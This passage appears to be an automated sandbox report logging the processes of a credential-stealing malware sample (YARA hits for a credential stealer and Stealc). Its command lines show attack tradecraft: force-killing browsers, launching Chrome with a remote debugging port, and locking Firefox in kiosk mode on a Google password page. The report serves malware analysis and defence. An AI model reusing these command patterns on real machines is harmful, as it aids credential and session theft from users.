                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:16:16:47
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'947'648 bytes
                                                                                                                                                                                                                                                            MD5 hash:87448823DAB50A9EDD9F481B99ACA4EE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:16:16:48
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:147'968 bytes
                                                                                                                                                                                                                                                            MD5 hash:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:16:16:49
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe"
                                                                                                                                                                                                                                                            Imagebase:0x15c06810000
                                                                                                                                                                                                                                                            File size:1'058'336 bytes
                                                                                                                                                                                                                                                            MD5 hash:971B0519B1C0461DB6700610E5E9CA8E
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:16:16:53
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:16:16:55
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe"
                                                                                                                                                                                                                                                            Imagebase:0xc30000
                                                                                                                                                                                                                                                            File size:1'854'464 bytes
                                                                                                                                                                                                                                                            MD5 hash:1C76387D2784B116B9F532B8B0A48C8B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.3232038991.0000000000938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.3235297402.0000000000938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.3358350057.0000000000938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:16:17:06
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe"
                                                                                                                                                                                                                                                            Imagebase:0xf70000
                                                                                                                                                                                                                                                            File size:2'871'296 bytes
                                                                                                                                                                                                                                                            MD5 hash:5F8D93018394ECD9F599AA2C10147A5F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000003.3064139165.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:16:17:11
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:16:17:13
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2072,i,2373336056486435438,11237397137693993043,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:16:17:13
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe"
                                                                                                                                                                                                                                                            Imagebase:0xc30000
                                                                                                                                                                                                                                                            File size:1'854'464 bytes
                                                                                                                                                                                                                                                            MD5 hash:1C76387D2784B116B9F532B8B0A48C8B
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3529309223.000000000177D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3526536288.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3595404950.000000000177D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3445606549.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3445606549.000000000177D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:16:17:15
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                                                                                                                            File size:966'656 bytes
                                                                                                                                                                                                                                                            MD5 hash:C62F6307B430705A222D91251C64A3FD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:16:17:25
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:16:17:25
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe"
                                                                                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                                                                                            File size:2'752'512 bytes
                                                                                                                                                                                                                                                            MD5 hash:C682C12739CBB53B85334E649CF0B772
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:16:17:25
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:16:17:25
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe"
                                                                                                                                                                                                                                                            Imagebase:0xf70000
                                                                                                                                                                                                                                                            File size:2'871'296 bytes
                                                                                                                                                                                                                                                            MD5 hash:5F8D93018394ECD9F599AA2C10147A5F
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000003.3214718315.0000000005640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:16:17:29
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                            Start time:16:17:29
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2204,i,16921492917580984058,10404394460730179528,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                                            Start time:16:17:30
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                                            Start time:16:17:30
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                                            Start time:16:17:31
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                            Start time:16:17:31
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                            Start time:16:17:32
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                            Start time:16:17:32
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                            Start time:16:17:33
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                                            Start time:16:17:33
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                                            Start time:16:17:33
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                                            Start time:16:17:34
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                                            Start time:16:17:34
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                                            Start time:16:17:34
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                                                                                                                            File size:966'656 bytes
                                                                                                                                                                                                                                                            MD5 hash:C62F6307B430705A222D91251C64A3FD
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                                            Start time:16:17:37
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2292 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce4f639-b801-4da5-9524-7365bf392772} 2816 "\\.\pipe\gecko-crash-server-pipe.2816" 223fe469310 socket
                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                                            Start time:16:17:38
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'438'776 bytes
                                                                                                                                                                                                                                                            MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                                            Start time:16:17:40
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                                            Start time:16:17:40
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
